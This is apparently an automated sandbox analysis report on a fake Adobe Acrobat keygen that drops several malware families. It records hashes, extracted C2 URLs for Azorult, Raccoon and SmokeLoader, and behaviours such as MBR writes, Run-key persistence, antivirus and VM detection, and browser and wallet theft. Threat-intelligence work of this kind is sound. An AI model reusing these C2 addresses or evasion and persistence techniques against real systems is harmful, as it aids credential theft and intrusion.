Analysis
-
max time kernel
54s -
max time network
601s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
09-03-2021 14:23
Static task
static1
Behavioral task
behavioral1
Sample
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
Resource
win7v20201028
General
-
Target
Adobe_Acrobat_9_keygen_by_KeygenNinja.exe
-
Size
8.2MB
-
MD5
456c5963a08824d34303db846ff8bf14
-
SHA1
c03e0c681008417923c0280a204fe7b54087154b
-
SHA256
413b1728b45d73f2d18d016edf377a461d58eec8bb662825713666d696cd3cdf
-
SHA512
6a14d4d6e57964f4fa79787c0badbac4773587874871f2095e01dcf3ab091d78a4892a63b6a74de5363d6e9a80865e4a984d63fe4f8c762b58de1193493754c8
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
raccoon
51c194bfb6e404af0e5ff0b93b443907a6a845b1
-
url4cnc
https://telete.in/h_focus_1
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
afefd33a49c7cbd55d417545269920f24c85aa37
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
e71b51d358b75fe1407b56bf2284e3fac50c860f
-
url4cnc
https://telete.in/oidmrwednesday
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/8980-467-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/8980-472-0x0000000003910000-0x000000000416D000-memory.dmp family_glupteba behavioral3/memory/8980-473-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
resource yara_rule behavioral3/memory/5072-215-0x00000000023A0000-0x00000000023C8000-memory.dmp family_redline behavioral3/memory/5072-222-0x0000000004930000-0x0000000004956000-memory.dmp family_redline behavioral3/memory/5264-387-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/6268-446-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral3/memory/3240-778-0x00000000026C0000-0x00000000026ED000-memory.dmp family_redline behavioral3/memory/3240-780-0x0000000002840000-0x000000000286C000-memory.dmp family_redline behavioral3/memory/6928-928-0x0000000004A40000-0x0000000004A7E000-memory.dmp family_redline behavioral3/memory/6928-933-0x0000000007190000-0x00000000071CC000-memory.dmp family_redline behavioral3/memory/9964-1487-0x0000000000400000-0x0000000000426000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 6 IoCs
resource yara_rule behavioral3/files/0x0005000000000697-54.dat Nirsoft behavioral3/files/0x0005000000000697-55.dat Nirsoft behavioral3/files/0x000100000001abaf-79.dat Nirsoft behavioral3/files/0x000100000001abaf-78.dat Nirsoft behavioral3/files/0x000100000001abc5-127.dat Nirsoft behavioral3/files/0x000100000001abc5-126.dat Nirsoft -
Executes dropped EXE 47 IoCs
pid Process 1456 keygen-pr.exe 3408 keygen-step-1.exe 1120 keygen-step-3.exe 1016 keygen-step-4.exe 3764 key.exe 2176 Setup.exe 208 AD754B4D3FE2C4EE.exe 2268 AD754B4D3FE2C4EE.exe 788 askinstall20.exe 4184 1615299604156.exe 4228 Install.exe 4388 multitimer.exe 4428 md2_2efs.exe 5004 1615299608500.exe 4880 file.exe 5056 multitimer.exe 5096 E600.tmp.exe 4988 E788.tmp.exe 4356 multitimer.exe 3776 1615299613562.exe 1624 E600.tmp.exe 4232 wbzaw1eymgj.exe 4488 v0utu55kp5k.exe 4528 vict.exe 4540 s1kajgjgass.exe 4556 0q1glrb1rdq.exe 4616 v0utu55kp5k.tmp 4672 n1ml530obys.exe 4688 vict.tmp 4740 IBInstaller_97039.exe 4724 s1kajgjgass.tmp 4716 askinstall24.exe 4708 Setup3310.exe 4700 chashepro3.exe 4156 vpn.exe 4464 Setup3310.tmp 4432 chashepro3.tmp 4936 IBInstaller_97039.tmp 4948 vpn.tmp 5072 Brava.exe 3756 Venita.exe 4100 BTRSetp.exe 2348 winlthst.exe 3772 app.exe 2188 mex.exe 4548 chrome_proxy.exe 2912 wimapi.exe -
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral3/files/0x0002000000015663-28.dat office_xlm_macros -
Loads dropped DLL 21 IoCs
pid Process 2780 MsiExec.exe 4616 v0utu55kp5k.tmp 4688 vict.tmp 4724 s1kajgjgass.tmp 4724 s1kajgjgass.tmp 4464 Setup3310.tmp 4464 Setup3310.tmp 4724 s1kajgjgass.tmp 4724 s1kajgjgass.tmp 4724 s1kajgjgass.tmp 4724 s1kajgjgass.tmp 4724 s1kajgjgass.tmp 4936 IBInstaller_97039.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp 4948 vpn.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\943028 = "\"C:\\Users\\Admin\\AppData\\Roaming\\roz5jpjjqre\\s1kajgjgass.exe\" /VERYSILENT" s1kajgjgass.tmp Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\lu4fer3gbby = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\0GOWAYNTBE\\multitimer.exe\" 1 3.1615299827.604784f3ed9c5" multitimer.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 58 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 414 ip-api.com 1305 ipinfo.io 1679 ipinfo.io 1995 ipinfo.io 357 ipinfo.io 1826 ipinfo.io 1942 ipinfo.io 2044 ipinfo.io 2138 ipinfo.io 102 ipinfo.io 1645 ipinfo.io 407 checkip.amazonaws.com 914 ipinfo.io 1002 ipinfo.io 2069 ip-api.com 661 ipinfo.io 1069 ipinfo.io 1303 ipinfo.io 1375 ipinfo.io 640 ipinfo.io 1090 checkip.amazonaws.com 1555 checkip.amazonaws.com 1983 ipinfo.io 528 ipinfo.io 1522 ip-api.com 63 api.ipify.org 201 ipinfo.io 338 ipinfo.io 769 ipinfo.io 1860 ipinfo.io 183 checkip.amazonaws.com 336 ipinfo.io 1231 checkip.amazonaws.com 2185 ipinfo.io 2211 checkip.amazonaws.com 1764 checkip.amazonaws.com 1868 ipinfo.io 2244 ipinfo.io 144 ip-api.com 442 ipinfo.io 1272 checkip.amazonaws.com 1391 ipinfo.io 1986 ipinfo.io 2037 ipinfo.io 104 ipinfo.io 1466 ipinfo.io 643 ipinfo.io 825 checkip.amazonaws.com 1176 ipinfo.io 2068 ipinfo.io 693 checkip.amazonaws.com 998 ipinfo.io 1268 ip-api.com 1373 ipinfo.io 1482 ipinfo.io 1686 ipinfo.io 861 ip-api.com 1220 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe File opened for modification \??\PhysicalDrive0 AD754B4D3FE2C4EE.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2176 Setup.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 208 set thread context of 3660 208 AD754B4D3FE2C4EE.exe 105 PID 208 set thread context of 4988 208 AD754B4D3FE2C4EE.exe 115 PID 208 set thread context of 3772 208 AD754B4D3FE2C4EE.exe 122 PID 5096 set thread context of 1624 5096 E600.tmp.exe 124 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\mex.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat v0utu55kp5k.tmp File created C:\Program Files (x86)\viewerise\is-OLQPF.tmp vict.tmp File created C:\Program Files (x86)\MaskVPN\is-K1SDH.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-A6JG0.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-B0QJJ.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-IUUHD.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-P9QPV.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-TUU5I.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-O21D6.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-GRIJP.tmp vpn.tmp File created C:\Program Files\HS4Y2D8D1I\HS4Y2D8D1.exe n1ml530obys.exe File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-TS0TS.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File created C:\Program Files (x86)\JCleaner\is-F928I.tmp chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-FS0BU.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Interop.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-1S066.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Refactoring.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-5EU6C.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-SIC94.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPN.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-49IJA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-0AVL7.tmp vpn.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\am805.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-01B2C.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\JCleaner\unins000.dat chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-3NDBM.tmp chashepro3.tmp File created C:\Program Files (x86)\JCleaner\is-R8H7I.tmp chashepro3.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-9CHLG.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-R2URS.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-4U8H9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\JCleaner\Venita.exe chashepro3.tmp File created C:\Program Files (x86)\viewerise\unins000.dat v0utu55kp5k.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\JCleaner\is-1NI4I.tmp chashepro3.tmp File created C:\Program Files (x86)\MaskVPN\is-B89F9.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-L57GK.tmp vpn.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-19PES.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\JCleaner\Brava.exe chashepro3.tmp File opened for modification C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Globalization.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\IBBrowserInstallerEngine\is-6ARGI.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\is-DA9UB.tmp vpn.tmp File created C:\Program Files (x86)\viewerise\is-88LB0.tmp v0utu55kp5k.tmp -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 9044 5008 WerFault.exe 197 8012 8796 WerFault.exe 425 680 6548 WerFault.exe 679 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName AD754B4D3FE2C4EE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 AD754B4D3FE2C4EE.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc AD754B4D3FE2C4EE.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E600.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E600.tmp.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 10936 schtasks.exe 11716 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 8852 timeout.exe 9484 timeout.exe 6772 timeout.exe 8928 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 34 IoCs
pid Process 9472 taskkill.exe 14980 taskkill.exe 15116 taskkill.exe 11708 taskkill.exe 13932 taskkill.exe 8636 taskkill.exe 7684 taskkill.exe 4976 taskkill.exe 10196 taskkill.exe 11772 taskkill.exe 8584 taskkill.exe 4140 taskkill.exe 5396 taskkill.exe 15012 taskkill.exe 11856 taskkill.exe 9996 taskkill.exe 11812 taskkill.exe 10340 taskkill.exe 3100 taskkill.exe 7452 taskkill.exe 2120 taskkill.exe 9012 taskkill.exe 6376 taskkill.exe 13620 taskkill.exe 13496 taskkill.exe 14432 taskkill.exe 12372 taskkill.exe 4612 taskkill.exe 4676 taskkill.exe 10788 taskkill.exe 9696 taskkill.exe 12876 taskkill.exe 8664 TASKKILL.exe 3544 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
